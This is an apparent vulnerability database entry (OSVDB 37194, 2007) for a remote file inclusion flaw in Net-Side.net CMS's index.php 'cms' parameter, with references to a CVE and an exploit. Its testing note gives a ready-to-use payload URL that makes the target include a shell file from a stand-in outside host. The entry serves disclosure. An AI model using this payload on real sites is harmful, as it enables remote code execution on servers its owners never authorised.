Net-Side.net CMS index.php cms Variable Remote File Inclusion

2007-03-24T00:00:00
ID OSVDB:37194
Type osvdb
Reporter OSVDB
Modified 2007-03-24T00:00:00

Description

Manual Testing Notes

http://[target]/index.php?cms=http://whatever.com/textshell.txt?

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/3562 CVE-2007-1707 Bugtraq ID: 23130